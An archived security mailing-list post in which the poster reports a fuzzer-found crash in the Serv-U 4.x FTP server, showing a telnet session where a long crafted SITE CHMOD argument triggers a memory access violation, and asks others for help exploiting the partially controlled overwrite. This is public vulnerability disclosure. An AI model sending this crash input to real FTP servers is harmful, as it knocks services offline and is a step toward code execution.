| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: maillist at bastart.eu.org (Some Guy) Subject: Serv-U 4.1 Memory Corruption / Whatever Well, I didn't have the time to fully analyze it yet, but by using a fuzzer to check Serv-U, I found something that crashed it using bad data in SITE CHMOD. This is not the already discovered vulnerability, cause it can be used without write access, the crash occurs before permissions are even checked. Seems like an off-by-two, cause you can control 2 bytes of a dword where your buffer gets written, but I wasn't able to find how the other 2 bytes are controlled yet, and I wasn't able to do anything useful with the 2 bytes I have cause they can't be NULL. Well, I hope someone can enlighten me a little, cause I tried the last 2 days and now I'm out of ideas. hello@...xy:~# telnet ftp.target.com 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 Serv-U FTP Server v4.0 for WinSock ready... USER myuser 331 User name okay, need password. PASS mypass 230 User logged in, proceed. SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU Connection closed by foreign host. hello@...xy:~# this will cause this an ccess violation writing to 0x555551AD (UUQ-)
Powered by blists - more mailing lists